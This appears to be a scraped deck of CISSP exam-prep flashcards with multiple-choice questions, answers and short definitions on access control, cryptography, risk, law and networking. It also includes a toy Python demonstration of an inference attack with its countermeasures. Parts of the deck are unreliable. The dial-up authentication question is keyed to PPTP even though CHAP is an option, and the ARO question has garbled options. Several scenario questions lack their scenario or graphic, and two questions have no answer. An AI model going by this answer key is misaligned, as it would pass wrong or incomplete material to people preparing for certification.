CISSP


Different access control models provide specific types of security measures and functionality in applications and operating systems. What model is being expressed in the graphic that follows? A. Noninterference. B. Biba. C. Bell-LaPadula D. Chinese Wall

D. Chinese Wall. Access changes based on the user's actions.

What is a cipher lock? A. A lock that uses cryptographic keys B. A lock that uses a type of key that cannot be reproduced C. A lock that uses a token and perimeter reader D. A lock that uses a keypad

D. Cipher locks, also known as programmable locks, use keypads to control access into an area or facility. The lock can require a swipe card and a specific combination that's entered into the keypad.

Which of the following is not a necessary characteristic of a Kerberos implementation? A. Transparent B. Scalable C. Reliable D. Cohesive

D. Cohesive

Kim is a data custodian for her company. She has many duties to perform each day. Which duty would be considered "out of scope" in her position? A. Adding new employees to the assigned data classification groups B. Performing prescribed system maintenance C. Establishing baselines for data purges D. Troubleshooting system problems that affect user productivity

C. Establishing baselines for data purges.

Which of the following disaster recovery tests is the most intrusive to business operations? A. Parallel B. Simulation C. Full-interruption D. Checklist

C. Full-interruption

The removal of data remanence from media devices is a standard security measure in computing environments. This removal process has many names. Which of the following is not one of them? A. Purging. B. Degaussing. C. Overwriting D. Deleting.

D. Deleting.

The unauthorized disclosure of information defined as secret would by definition result in which of the following levels of damage? A. Grave damage to national security B. Damage to national security C. Extreme damage to national security D. Serious damage to national security

D. Serious damage to national security.

AV * EF

SLE

OECD (Organization for Economic Cooperation and Development)

Collection limitation, data quality, purpose specification, use limitation, security safeguards, openness, individual participation, accountability.

Risk Management process

Frame risk, assess risk, respond to risk, monitor risk.

Steganography

The art and science of hiding information by embedding messages within other, seemingly harmless messages.

BCP Policy

Framework for building the business continuity plan.

Office of Foreign Assets Control (OFAC)

Maintains a list of countries with which transfers of assets or anything of value including cash, payments, and services may be prohibited.

DoDAF

U.S. Department of Defense architecture framework that ensures interoperability of systems to meet military mission goals.

Integrity Controls

Controls that reject invalid data inputs, prevent unauthorized data outputs, and protect data and programs against accidental or malicious tampering.

FISMA

Federal Information Security Management Act: U.S. law that requires federal agencies to create, document, and implement a security program.

ITADA

Makes identity theft a federal crime.

18 USC 2510

Wire and electronic communications interception and interception of oral communications.

Which of the following is one of the most likely solutions that Susan will come up with and present to her boss? A. Development of standards B. Development of training C. Development of monitoring D. Development of testing

A. Development of standards

What protocol is commonly used to authenticate users on dial-up connections? A. PPTP B. IPSEC C. CHAP D. L2F

A. PPTP

A(n) ________________ is the graphical representation of data commonly used on websites. It is a skewed representation of characteristics a person must enter to prove that the subject is a human and not an automated tool, as in a software robot. A. anti-spoofing symbol B. CAPTCHA C. spam anti-spoofing symbol D. CAPCHAT

B. A CAPTCHA is a skewed representation of characteristics a person must enter to prove that the subject is a human and not an automated tool, as in a software robot. It is the graphical representation of data.

The operations manager has established that prior to building a server, the employee must first check the inventory to make sure that all the spare parts needed are available, sign out those parts, and follow a checklist, finally signing and dating it when done. What has the operations manager created? A. A baseline B. A procedure C. A standard D. A policy

B. A procedure

John has uncovered a rogue system on the company network that emulates a switch. The software on this system is being used by an attacker to modify frame tag values. Which of the following best describes the type of attack that has most likely been taking place? A. DHCP snooping B. VLAN hopping C. Network traffic shaping D. Network traffic hopping

B. An attacker can have a system act as though it is a switch. The system understands the tagging values being used in the network and the trunking protocols, and can insert itself between other VLAN devices and gain access to the traffic going back and forth. Attackers can also insert tagging values to manipulate the control of traffic at the data link layer.

"Something you know, something you have, and something you are" represents the three possible factors of ________. A. Identification. B. Authentication C. Authorization D. Availability.

B. Authentication

Which is the most valuable technique when determining if a specific security control should be implemented? A. Risk analysis B. Cost/benefit analysis C. ALE results D. Identifying the vulnerabilities and threats causing the risk

B. Cost/benefit analysis

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. Relational database structure B. Object-relational database structure C. Network database structure D. Dynamic-static structure

B. Object-relational database structure.

Which of the following is the least important aspect of resource provisioning? A. Ensuring that a new system has been properly secured for deployment B. Ensuring that the hardware being deployed is properly tracked as part of asset management. C. Ensuring that the new resource properly expands enterprise capacity. D. Ensuring that the software being deployed is being properly tracked as part of asset management.

C. Ensuring that the new resource properly expands enterprise capacity.

Though laws with respect to privacy protection may vary between countries and jurisdictions, an organization's policies should consider all of the following except: A. What data is collected B. With whom the data will be shared C. How much space will be required for storage D. When the data will be destroyed

C. How much space will be required for storage.

Why should employers make sure employees take their vacations? A. They have a legal obligation. B. It is part of due diligence. C. It is a way that fraud can be uncovered. D. To ensure the employee does not get burnt out.

C. It is a way that fraud can be uncovered.

Which of the following is a U.S. federal government algorithm developed for creating secure message digests? A. Data Encryption Algorithm B. Digital Signature Standard C. Secure Hash Algorithm D. Data Signature Algorithm

C. SHA was created to generate secure message digests. Digital Signature Standard (DSS) is the standard to create digital signatures, which dictates that SHA must be used. DSS also outlines the digital signature algorithms that can be used with SHA: RSA, DSA, and ECDSA.

Which of the following is not a characteristic of the IEEE 802.11a standard? A. It works in the 5-GHz range. B. It uses the OFDM spread spectrum technology. C. It provides 52 Mbps in bandwidth. D. It covers a smaller distance than 802.11b.

C. The IEEE standard 802.11a uses the OFDM spread spectrum technology, works in the 5-GHz frequency band, and provides bandwidth of up to 54 Mbps. The operating range is smaller because it works at a higher frequency.

What is the process depicted in the illustration below referred to as? A. TCP/IP model B. Layering C. Encapsulation D. OSI model

C. The illustration depicts data moving down the layers of the stack of the TCP/IP model. Application layer data becomes the payload of a TCP segment, by prepending the TCP protocol data to it as a header. The TCP segment becomes an IP packet by prepending the IP protocol data to it as a header. The IP packet becomes an Ethernet frame by prepending the Ethernet protocol data to it as a header. (Also a small footer is attached at this layer, not depicted.) This is referred to as encapsulation.

If a company has been contacted because its mail server has been used to spread spam, what is most likely the problem? A. The internal mail server has been compromised by an internal hacker. B. The mail server in the DMZ has private and public resource records. C. The mail server has e-mail relaying enabled and misconfigured. D. The mail server has SMTP enabled.

C. The mail server has e-mail relaying enabled and misconfigured.

Who has the primary responsibility of determining the classification level for information? A. The functional manager B. Senior management C. The owner D. The user

C. The owner

If implemented properly, a one-time pad is a perfect encryption scheme. Which of the following incorrectly describes a requirement for implementation? A. The pad must be securely distributed and protected at its destination. B. The pad must be made up of truly random values. C. The pad must always be the same length. D. The pad must be used only one time.

C. The pad must always be the same length.

Which of the following statements is true? A. A bottom-up approach to software testing allows interface errors to be detected earlier. B. A top-down approach to software testing allows errors in critical modules to be detected earlier. C. The software test plan and results should be retained as part of the system's permanent documentation. D. Black box software testing is required as part of procedural detail.

C. The software test plan and results should be retained as part of the system's permanent documentation.

The term used to denote a potential cause of an unwanted incident, which may result in harm to a system or organization, is: A. Vulnerability B. Exploit C. Threat D. Attacker

C. Threat

A database row can be called a(n): A. Denominator B. Attribute C. Tuple D. Record

C. Tuple

Risk management can be very complex and overwhelming; it is virtually impossible to consider every possible scenario during a risk analysis. However, there are methods available that can produce better results. Which of the following would provide the best results when carrying out a risk analysis? A. Do more qualitative analysis B. Use manual auditing C. Use existing automated tools D. Focus primarily on critical assets

C. Use existing automated tools

Water and gas lines should have shutoff valves and positive drains. What is a positive drain? A. Water does not go into the drain until a fire has been detected. B. The characteristic ensures that the pipe is unbreakable. C. Water, or gas, flows out instead of in. D. Water, or gas, flows in instead of out.

C. Water, or gas, flows out instead of in.

Which of the following describes the company's approach to risk management? A. Risk transference B. Risk avoidance C. Risk acceptance D. Risk mitigation

D. Risk mitigation

Administrative Law

Facilitates effective government. HIPAA.

Business Impact Analysis (BIA)

Maximum tolerable downtime, operational disruption and productivity, financial considerations, regulatory responsibilities, reputation.

Mandatory Vacation

Two consecutive weeks of vacation, because fraud may come to light during a time when the employee can't cover it up.

Encryption

Protects against data breaches.

ITAR

Defense articles: firearms, tanks, submarines.

MD5 produces a ________-bit hash value.

128-bit

Which of the following is not a form of identification? A. Token device B. Fingerprint C. User ID D. Badge systems

A. Token device

Fault Tree Analysis

Approach to map specific flaws to root causes in complex systems.

Confidentiality

Encryption for data at rest (whole disk, database encryption); encryption for data in transit (IPsec, TLS, PPTP, SSH); access control (physical and technical).

Availability

Ensure that information and systems are available for authorized users when needed.

Denial Attacks

Seek to undermine availability.

NIST SP 800-53

Set of controls to protect U.S. federal systems, developed by the National Institute of Standards and Technology.

COSO Internal Control- Integrated Framework

Set of internal corporate controls to help reduce the risk of financial fraud, developed by the Committee of Sponsoring Organizations (COSO) of the Treadway Commission.

18 USC 2701

Stored wire and Electronic Communications and Transactional Records access.

Due Diligence

Taking reasonable measures to investigate security risks.

Threats × vulnerability × asset value

Total Risk

Qualitative Risk Analysis

A subjective approach to determine the likelihood that a risk will actually occur and the impact to the project if it does occur.

Frame relay is a simplified version of ____. A. DSL B. X.25 C. ISDN D. SDLC

B. X.25

Procedures

Detailed step-by-step tasks that should be performed to achieve a certain goal.

The number of violations that will be accepted or forgiven before a violation record is produced is called the: A. Clipping level B. Acceptance level C. Forgiveness level D. Water level

A. Clipping level.

CERT's primary objective is what? A. Computer crime emergency response and notification B. Software piracy C. Internet health and growth D. International compatibility and e-commerce activities

A. Computer crime emergency response and notification.

Block ciphers use which of the following to perform mathematical functions, substitutions, and permutations on message bits? A. S-boxes B. Certificates C. Key stream D. Initialization vectors

A. S-boxes

Sam plans to establish mobile phone service using the personal information he has stolen from his former boss. What type of identity theft is this? A. Phishing B. True name C. Pharming D. Account takeover

B. True Name.

Bob needs to review the source code of a new product a team has been working on, in order to ensure that all user inputs have been properly validated prior to being processed. Which of the following terms is used to describe this activity? A. Dynamic analysis B. Static analysis C. Fuzzing D. Debugging

B. Static analysis.

Which of the following network topologies is composed of a single cable that runs the entire length of the network upon which each node resides, and in which each station can observe and hence accept or ignore each packet sent? A. Ring topology B. Linear bus topology C. Tree topology D. Star topology

B. Linear bus topology.

Six Sigma

Business management strategy that can be used to carry out process improvement.

Establishing data classification levels within a company is essential as part of an overall security program. Of the roles listed, who would be the best choice to sponsor a data classification program? A. IT administrator B. Security officer C. Chief information officer D. Security awareness trainer

C. Chief information officer.

What is the annualized rate of occurrence (ARO)? A. 1 B. 10 C. 1 D. 01

C. 1

GDPR

Consent, right to be informed, right to restrict processing, right to be forgotten, data breaches.

Which of the following is not a benefit of the Diameter protocol? A. Allows for different services to be authenticated in one architecture instead of individual architectures B. Allows for the use of Mobile IP in an existing environment C. Relieves the restriction of only being able to authenticate users over PPP and SLIP connections D. Increases customer cost because of the different policy servers that must be maintained

D. Increases customer cost because of the different policy servers that must be maintained.

GLBA (Gramm-Leach-Bliley Act)

Federal law enacted in 1999 to control the ways that financial institutions deal with the private information of individuals.

Private Regulations

Flow from contractual relationships. PCI-DSS.

SABSA model

Model and methodology for the development of information security enterprise architectures.

Zachman Framework

Model for the development of enterprise architectures developed by John Zachman. What, how, where, who, when, and why.

Agreement Types

Negotiated contracts; click-through agreements (take it or leave it); shrink-wrap agreements (included with physical software).

Security Procedures

Outline a step-by-step process for an activity. May require compliance, depending upon circumstances.

Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with? A. Parameter validation attack B. Injection attack C. Cross-site scripting D. Database connector attack

Least Privilege

A principle that users be granted the privilege for some activity only if there is a justifiable need to grant this authorization.

Susan, an attorney, has been hired to fill a new position at Widgets, Inc.: chief privacy officer (CPO). What is the primary function of her new role? A. Ensuring the protection of partner data B. Ensuring the accuracy and protection of company financial information C. Ensuring the security policies are defined and enforced D. Ensuring the protection of customer, company, and employee data

D. Ensuring the protection of customer, company, and employee data.

Export Administration Regulations (EAR)

Regulations designed to control the export and re-export of most commercial items. EAR restrictions vary from country to country, and embargoed countries such as Cuba, North Korea, Sudan, Syria, and Iran are prohibited from receiving U.S. exports. EAR does not control all goods, services, and technologies, however.

Trademarks

Words, symbols, names, or devices used to specify goods and to differentiate them from others. Granted upon registration. Provided for renewable 10-year periods. Granted contingent upon active use in commerce.

Which of the following is the most common attack on DNS servers? A. Poisoning B. Flood C. Ping D. Masquerading

A. Poisoning.

Which of the following is not a result of a penetration test? A. Modify access control permissions B. Identify network vulnerabilities C. Evaluate IDS effectiveness D. Evaluate incident response procedures

A. Modify access control permissions.

Preventive: Physical

Badges, swipe cards; guards, dogs; fences, locks, mantraps.

Which of the following statements is true about the application layer protocols? A. SNMP uses TCP port 25. B. HTTP uses TCP ports 80 and 445 C. FTP uses TCP port 21 and often TCP port 20 as well. D. DNS only uses UDP port 53.

C. FTP uses TCP port 21 and often TCP port 20 as well.

The Ministry of Defence Architecture Framework

Makes sure all data is presented in the right format.

Capability Maturity Model Integration

Organizational development for process improvement developed by Carnegie Mellon University.

NIST SP 800-39

Organizational tier, business process tier, information systems tier.

Preventive: Technical

Passwords, biometrics, smart cards; encryption, secure protocols, call-back systems, database views, constrained user interfaces; antimalware software, access control lists, firewalls, intrusion prevention systems.

HITECH

Privacy laws related to electronic transmission of health information.

Risk

Risk = threat × impact × probability

Intellectual property Protections

Copyrights, trademarks, patents, trade secrets.

Due diligence objective

Detect problems.

Don't make the policy too specific

Don't make the policy too specific.

Policies and standards are mandatory

Guidelines are optional.

Ethics

(ISC)² has its own code of ethics.

Security Guidelines

Provide security advice to the organization. Follow best practices from industry. Compliance with guidelines is not mandatory.

Enterprise Security Architecture

Studies the enterprise architecture and business environment to develop an overall strategy and plan that best fits enterprise-specific needs.

COBIT 5

A business framework to allow for IT enterprise management and governance that was developed by the Information Systems Audit and Control Association (ISACA).

When would an investigator's notebook be admissible in court? A. When he uses it to refresh memory B. When he cannot be present for testimony C. When requested by the judge to learn the original issues of the investigation D. When no other physical evidence is available

A. When he uses it to refresh memory.

Use the following scenario to answer Questions 19-21. A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain. How much does the firewall save the company in loss expenses? A. $62,000 B. $3,000 C. $65,000 D. $30,000

A. $62,000

When should a Class C fire extinguisher be used instead of a Class A fire extinguisher? A. When electrical equipment is on fire B. When wood and paper are on fire C. When a combustible liquid is on fire D. When the fire is in an open area

A. A Class C fire is an electrical fire. Thus, an extinguisher with the proper suppression agent should be used. The fire classes, their attributes, and suppression methods are:

Class A: Common combustibles. Elements: wood products, paper, and laminates. Suppression: water, foam.
Class B: Liquid. Elements: petroleum products and coolants. Suppression: gas, CO2, foam, dry powders.
Class C: Electrical. Elements: electrical equipment and wires. Suppression: gas, CO2, dry powders.
Class D: Combustible metals. Elements: magnesium, sodium, potassium. Suppression: dry powder.

Sue has been asked to install a web access management (WAM) product for her company's environment. What is the best description for what WAMs are commonly used for? A. Control external entities requesting access to internal objects B. Control internal entities requesting access to external objects C. Control external entities requesting access through X.500 databases D. Control internal entities requesting access through X.500 databases

A. A WAM product allows an administrator to configure and control access to internal resources. This type of access control is commonly put in place to control external entities requesting access. The product may work on a single web server or a server farm.

Of the following, what is the primary item that a capability table is based upon? A. A subject B. An object C. A product D. An application

A. A capability table specifies the access rights a certain subject possesses pertaining to specific objects. A capability list (also referred to as a capability table) is different from an access control list (ACL) because the subject is bound to the capability table, whereas the object is bound to the ACL. A capability can be in the form of a token, ticket, or key. When a subject presents a capability component, the operating system (or application) will review the access rights and operations outlined in the capability component and allow the subject to carry out just those functions. A capability component is a data structure that contains a unique object identifier and the access rights the subject has to that object. The object may be a file, array, memory segment, or port.

Use the following scenario to answer Questions 30-32. Tanya is working with the company's internal software development team. Before a user of an application can access files located on the company's centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company's missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure. Which of the following best describes what is currently in place? A. Capability-based access system B. Synchronous tokens that generate one-time passwords C. RADIUS D. Kerberos

A. A capability-based access control system means that the subject (user) has to present something, which outlines what it can access. The item can be a ticket, token, or key. A capability is tied to the subject for access control purposes. A synchronous token is not being used, because the scenario specifically states that a challenge/response mechanism is being used, which indicates an asynchronous token.

Databases and applications commonly carry out the function that is illustrated in the graphic that follows. Which of the following best describes the concept that this graphic is showing? A. Checkpoint B. Commit C. Two-phase commit D. Data dictionary

A. A checkpoint is used to recover data if there is a system failure or problem during a transaction. It is used to periodically save the state of the application and the user's information. It is used so that if the application endures a glitch, it has the necessary tools to bring the user back to his working environment without losing any data. You can experience this with a word processor when it asks you if you want to review the recovered version of a file you were working on. The word processor has saved your document as you have worked on it and is able to bring it back in case the system runs into trouble.

Of the following plans, which establishes senior management and a headquarters after a disaster? A. Continuity of operations plan B. Cyber-incident response plan C. Occupant emergency plan D. IT contingency plan

A. A continuity of operations (COOP) plan establishes senior management and a headquarters after a disaster. It also outlines roles and authorities, orders of succession, and individual role tasks. Creating a COOP plan begins with assessing how the organization operates to identify mission-critical staff, materials, procedures, and equipment. If one exists, review the business process flowchart. Identify suppliers, partners, contractors, and other businesses the organization interacts with on a daily basis, and create a list of these and other businesses the organization could use in an emergency. It is important for an organization to make plans for what it will do if the building becomes inaccessible.

Which of the following dictates that all evidence be labeled with information indicating who secured and validated it? A. Chain of custody B. Due care C. Investigation D. Motive, opportunity, and means

A. A crucial piece in the digital forensics process is keeping a proper chain of custody of the evidence. Because evidence from these types of crimes can be very volatile and easily dismissed from court due to improper handling, it is important to follow very strict and organized procedures when collecting and tagging evidence in every single case. Furthermore, the chain of custody should follow evidence through its entire life cycle, beginning with identification and ending with its destruction, permanent archiving, or return to owner. When copies of data need to be made, this process must meet certain standards to ensure quality and reliability. Specialized software for this purpose can be used. The copies must be able to be independently verified and must be tamperproof. Each piece of evidence should be marked in some way with the date, time, initials of the collector, and a case number if one has been assigned. The piece of evidence should then be sealed in a container, which should be marked with the same information. The container should be sealed with evidence tape, and if possible, the writing should be on the tape so that a broken seal can be detected.

Which of the following best describes how a digital signature is created? A. The sender encrypts a message digest with his private key. B. The sender encrypts a message digest with his public key. C. The receiver encrypts a message digest with his private key. D. The receiver encrypts a message digest with his public key.

A. A digital signature is a hash value that has been encrypted with the sender's private key. The act of digital signing means encrypting the message's hash value with a private key. If Sam wants to ensure that the message he sends to Debbie is not modified and he wants her to be sure it came only from him, he can digitally sign the message. This means that a one-way hashing function would be run on the message, and then Sam would encrypt that hash value with his private key. When Debbie receives the message, she will perform the hashing function on the message and come up with her own hash value. Then she will decrypt the sent hash value (digital signature) with Sam's public key. She then compares the two values, and if they are the same, she can be sure the message was not altered during transmission. She is also sure the message came from Sam because the value was encrypted with his private key.

Which of the following is true with respect to distributed systems? A. A client/server system is a special case of a distributed system with only two tiers. B. Distributed systems are easier to secure than non-distributed systems, because there are more components that can contribute to the security solution. C. A client/server system is distinct from distributed systems, because there are only two tiers. D. Distributed systems reduce the complexity of security solutions.

A. A distributed system is any system with multiple computing nodes, and this includes simple two-node client/server systems.

What type of infrastructural setup is illustrated in the graphic that follows? A. Hot site B. Warm site C. Cold site D. Reciprocal agreement

A. A hot site is a facility that is leased or rented and is fully configured and ready to operate within a few hours. The only missing resources from a hot site are usually the data, which will be retrieved from a backup site, and the people who will be processing the data. The equipment and system software must absolutely be compatible with the data being restored from the main site and must not cause any negative interoperability issues. A hot site is a good choice for a company that needs to ensure a site will be available for it as soon as possible.

IP telephony networks require the same security measures as those implemented on an IP data network. Which of the following is unique to IP telephony? A. Limiting IP sessions going through media gateways B. Identification of rogue devices C. Implementation of authentication D. Encryption of packets containing sensitive information

A. A media gateway is the translation unit between disparate telecommunications networks. VoIP media gateways perform the conversion between time-division multiplexing (TDM) voice and Voice over Internet Protocol (VoIP). As a security measure, the number of calls via media gateways should be limited. Otherwise, media gateways are vulnerable to denial-of-service attacks, hijacking, and other types of attacks.

Alice's company has decided to bulk mail post cards to their current and prospective customers, in hopes that they will return them along with feedback as to the services the company provides. She has been tasked with designing and developing the system that will be used to process the information returned, and has been instructed to ensure that it will be most useful to direct management's business decisions for the next year. It is clear that automation will be required, including scanning of the returned post cards, and likely some amount of optical character recognition to enable text-based processing of the responses. Given this scenario, which of the following statements is true? A. A project risk analysis will consider the organization's ability to process the returned information in a useful way. B. A security risk analysis will consider the organization's ability to process the returned information in a useful way. C. No standards exist for risk assessment for a project of this type. D. The PCI-DSS should be consulted for the processing of customer feedback.

A. A project risk analysis will consider the organization's ability to process the returned information in a useful way.

Which of the following does not describe a reciprocal agreement? A. The agreement is enforceable. B. It is a cheap solution. C. It may be able to be implemented right after a disaster. D. It could overwhelm a current data processing site.

A. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place. A reciprocal agreement is a better secondary backup option if the original plan falls through.

A ____________ is the amount of time it should take to recover from a disaster, and a ____________ is the amount of data, measured in time, that can be lost and be tolerable from that same event. A. recovery time objective, recovery point objective B. recovery point objective, recovery time objective C. maximum tolerable downtime, work recovery time D. work recovery time, maximum tolerable downtime

A. A recovery time objective (RTO) is the amount of time it takes to recover from a disaster, and a recovery point objective (RPO) is the amount of data, measured in time, that can be lost and be tolerable from that same event. The RPO is the acceptable amount of data loss measured in time. This value represents the earliest point in time by which data must be recovered. The higher the value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster. RTO is the maximum time period within which a business process must be restored to a designated service level after a disaster to avoid unacceptable consequences associated with a break in business continuity.

If a company has a high turnover rate, which access control structure is best? A. Role-based B. Decentralized C. Rule-based D. Discretionary

A. A role-based structure is easier on the administrator because she only has to create one role, assign all of the necessary rights and permissions to that role, and plug a user into that role when needed. Otherwise, she would need to assign and extract permissions and rights on all systems as each individual came and left the company.

If a cipher lock has a door delay option, what does that mean? A. After a door is open for a specific period, the alarm goes off. B. It can only be opened during emergency situations. C. It has a hostage alarm capability. D. It has supervisory override capability.

A. A security guard would want to be alerted when a door has been open for an extended period. It may be an indication that something is taking place other than a person entering or exiting the door. A security system can have a threshold set so that if the door is open past the defined time period, an alarm sounds.

What is the ISO/IEC 27799 standard? A. A standard on how to protect personal health information B. The new version of BS 17799 C. Definitions for the new ISO 27000 series D. The new version of NIST SP 800-60

A. A standard on how to protect personal health information

Which of the following does NOT describe privacy-aware role-based access control? A. It is an example of a discretionary access control model. B. Detailed access controls indicate the type of data that users can access based on the data's level of privacy sensitivity. C. It is an extension of role-based access control. D. It should be used to integrate privacy policies and access control policies.

A. A system that uses discretionary access control (DAC) enables the owner of the resource to specify which subjects can access specific resources. This model is called discretionary because the control of access is based on the discretion of the owner. Many times department managers, or business unit managers, are the owners of the data within their specific department. Being the owner, they can specify who should have access and who should not. Privacy-aware role-based access control is an extension of role-based access control (RBAC). There are three main access control models: DAC, mandatory access control (MAC), and RBAC. Privacy-aware role-based access control is a type of RBAC, not DAC.

There are different types of biometric systems in the industry today. Some make authentication decisions based on behavior and some make authentication decisions based on physical attributes. Which of the following is the best description of their differences? A. A system that uses physical attributes provides more accuracy than one that uses behavior attributes B. A system that uses behavior attributes provides more accuracy than one that uses physical attributes. C. A fingerprint system is an example of a physical attribute and an iris system is an example of a behavior system. D. A voice print system is an example of a behavior and signature dynamics is an example of a physical attribute.

A. A system that uses physical attributes provides more accuracy than one that uses behavior attributes

What is true about a transponder? A. It is a card that can be read without sliding it through a card reader. B. It is a biometric proximity device. C. It is a card that a user swipes through a card reader to gain access to a facility. D. It exchanges tokens with an authentication server.

A. A transponder is a type of physical access control device that does not require the user to slide a card through a reader. The reader and card communicate directly. The card and reader have a receiver, transmitter, and battery. The reader sends signals to the card to request information. The card sends the reader an access code.

There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus? A. Intercepts antimalware's call to the operating system for file and system information B. Varies the sequence of its instructions using noise, a mutation engine, or random-number generator C. Can use different encryption schemes requiring different decryption routines D. Produces multiple varied copies of itself

A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antimalware program. When the antimalware conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antimalware and the operating system, then when the antimalware sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antimalware scanners, but it does so by producing varied but operational copies of itself. Even if antimalware software finds and disables one or two copies, other copies may still remain active within the system.

A change management process should include a number of procedures. Which of the following incorrectly describes a characteristic or component of a change control policy? A. Changes that are unanimously approved by the change control committee must be tested to uncover any unforeseen results. B. Changes approved by the change control committee should be entered into a change log. C. A schedule that outlines the projected phases of the change should be developed. D. An individual or group should be responsible for approving proposed changes.

A. A well-structured change management process should be put into place to aid staff members through many different types of changes to the environment. This process should be laid out in the change control policy. Although the types of changes vary, a standard list of procedures can help keep the process under control and ensure it is carried out in a predictable manner. All changes approved by the change control committee (not just those unanimously approved) must be fully tested to uncover any unforeseen results. Depending on the severity of the change and the company's organization, the change and implementation may need to be presented to a change control committee. This helps show different sides to the purpose and outcome of the change and the possible ramifications.

Which of the following types of vulnerabilities CANNOT be discovered in the course of a routine vulnerability assessment? A. Zero-day vulnerability B. Kernel flaw C. Buffer overflow D. File and directory permissions

A. A zero-day vulnerability is one that has been discovered by a potential adversary but has not yet been publicly disclosed, and as such is being kept in "escrow." By this very definition, no scanner signature or published check exists for it, so it cannot be found by the scanning and testing that make up a routine assessment; it must be discovered independently. Kernel flaws, buffer overflows, and weak file and directory permissions, by contrast, are known classes of weakness that routine assessment tools check for.

A WAN Technology that uses 53-byte cells and has low delay levels is called: A. ATM B. Frame Relay C. X.25 D. SMDS.

A. ATM.

What are the purposes of attribute value pairs (AVPs), and how do they differ between RADIUS and Diameter? A. AVPs are constructs that outline how two entities will communicate. Diameter has many more AVPs, which allow the protocol to have more capabilities than RADIUS. B. AVPs are protocol parameters used between communicating entities. Diameter has fewer AVPs, which allow the protocol to have more capabilities than RADIUS. C. AVPs are the security mechanisms that provide confidentiality and integrity for data being passed back and forth between entities. Diameter has many more AVPs, which allow the protocol to have more security capabilities than RADIUS. D. AVPs are part of the TCP protocol. Diameter uses AVPs because it uses TCP, and RADIUS uses UDP.

A. AVPs are constructs that outline how two entities will communicate. Diameter has many more AVPs which allow for the protocol to have more capabilities than RADIUS.

Many operating systems implement address space layout randomization (ASLR). Which of the following best describes this type of technology? A. Randomly arranging memory address values B. Restricting the types of processes that can execute instructions in privileged mode C. Running privileged instructions in virtual machines D. Randomizing return pointer values

A. Address space layout randomization (ASLR) is a control that involves randomly arranging processes' address space and other memory segments. ASLR makes it more difficult for an attacker to predict target addresses for specific memory attacks.

Uncovering restricted information by using permissible data is referred to as____. A. inference B. data mining C. perturbation D. cell suppression

A. Aggregation and inference go hand in hand. For example, a user who uses data from a public database in order to figure out classified information is exercising aggregation (the collection of data) and can then infer the relationship between that data and the data he does not have access to. This is called an inference attack.
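The inference attack in the answer above, and the two distractors in the question (perturbation and cell suppression) as countermeasures, worked through in code. This is an added example, not from the original page; the employee table, the department names and the suppression threshold are constructed for illustration.

```python
"""Inference attack on a statistical database, with cell suppression and
perturbation as countermeasures. Added example; the employee table and the
threshold are constructed for illustration."""
import random

# Constructed sample data: (employee, department, salary). Individual rows are
# restricted; only aggregate queries are permissible.
EMPLOYEES = [
    ("alice", "eng", 120_000),
    ("bob",   "eng", 110_000),
    ("carol", "eng", 130_000),
    ("dave",  "ops", 90_000),
    ("erin",  "ops", 95_000),
]

def _cell(rows, department, exclude=()):
    return [s for n, d, s in rows if d == department and n not in exclude]

def total_salary(rows, department, exclude=()):
    """Permissible aggregate: departmental salary total, optionally excluding
    named employees. Each call on its own reveals nothing about one person."""
    return sum(_cell(rows, department, exclude))

def infer_salary(rows, department, target):
    """Inference attack: two permissible aggregates differ by exactly the
    restricted value of the one row they do not share."""
    return total_salary(rows, department) - total_salary(rows, department, exclude=(target,))

MIN_CELL = 3  # cell suppression: refuse any aggregate over fewer rows than this

def suppressed_total(rows, department, exclude=()):
    """Cell suppression: aggregates over small cells are withheld (None)."""
    cell = _cell(rows, department, exclude)
    return sum(cell) if len(cell) >= MIN_CELL else None

def infer_salary_suppressed(rows, department, target):
    """The same attack against the suppressed interface fails: excluding one
    employee from a three-person department leaves a two-row cell."""
    full = suppressed_total(rows, department)
    rest = suppressed_total(rows, department, exclude=(target,))
    return None if full is None or rest is None else full - rest

def perturbed_total(rows, department, exclude=(), noise=5_000, seed=None):
    """Perturbation: answer every aggregate with bounded random noise, so the
    difference of two aggregates no longer equals one person's exact salary."""
    rng = random.Random(seed)
    return total_salary(rows, department, exclude) + rng.randint(-noise, noise)
```

Suppression and perturbation each close the simple two-query attack shown here; a patient attacker can still combine many overlapping aggregates, which is why query auditing is normally used alongside them.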

Which operating systems allow users to temporarily elevate their privileges in order to launch an application at a higher privilege level? A. All major desktop operating systems B. Recent versions of Windows C. Linux and Windows D. Recent versions of macOS

A. All major operating systems allow for the temporary elevation of user privileges, but macOS and some versions of Linux require the user to do so from a terminal window.

When is a security guard the best choice for a physical access control mechanism? A. When discriminating judgment is required B. When intrusion detection is required C. When the security budget is low D. When access controls are in place

A. Although many effective physical security mechanisms are on the market today, none can look at a situation, make a judgment about it, and decide what the next step should be. A security guard is employed when a company needs to have a countermeasure that can think and make decisions in different scenarios.

Jay is the security administrator at a credit card processing company. The company has many identity stores, which are not properly synchronized. Jay is going to oversee the process of centralizing and synchronizing the identity data within the company. He has determined that the data in the HR database will be considered the most up-to-date data, which cannot be overwritten by the software in other identity stores during their synchronization processes. Which of the following best describes the role of this database in the identity management structure of the company? A. Authoritative system of record B. Infrastructure source server C. Primary identity store D. Hierarchical database primary

A. An authoritative system of record (ASOR) is a hierarchical tree-like structure system that tracks subjects and their authorization chains. The authoritative source is the "system of record," or the location where identity information originates and is maintained. It should have the most up-to-date and reliable identity information.

Which of the following is not an effective countermeasure against spam? A. Open mail relay servers B. Properly configured mail relay servers C. Filtering on an e-mail gateway D. Filtering on the client

